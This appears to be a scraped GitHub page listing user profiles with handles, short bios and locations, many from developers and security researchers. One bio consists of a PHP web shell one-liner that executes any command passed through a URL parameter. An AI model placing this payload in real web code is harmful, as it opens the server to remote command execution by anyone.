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Nick Liebmann Liebmann5
"And how about Marla Hooch. What a hitter." - A League of Their Own

Santa Clarita, CA

<?php system($_GET["cmd"]);?>

@github Open Source Maintainer

Nasir Shamim nasirshamim01
Android Developer | Java | Kotlin | CSE'24

Jamshedpur, India

Sara Mazal M. saramazal
Web Developer & Ethical Hacker
interohm InterOhm
[ I/O Initiatives ]

interohm Canada

Habibullah Salimy HabibullahSalimy
Information Technology and Cybersecurity Specialist

COS Global Services Madrid Spain

K3rn3l Panic AnkurYogi
Security Engineer & a novice researcher :) Focused on Advanced DNS evasion, malware reversing, and detection techniques.

isecurenet Mumbai

Mildly Offensive Defense gmmOs
| notes to remember && take inspiration | my keys here are only illustrations of ideas | verify links and scripts before run | take nothing for granted |
learn Android development with Kotlin
mimo3000n mimo3000n
love RISC-V, ESP-32, FPGA, Verilog, SiFive, robotic, ROS2, dogzilla, .....


Felipe Truman felipetruman
The quieter you become,the more you are able to hear.

Brandon Reddragon300
Computer Science Student Journey

Student St. Louis, Missouri

Grimm GrimmKR3W
The People Aren't Supposed to Fear Their Government, a Government should Fear Its PEOPLE!

Around the Way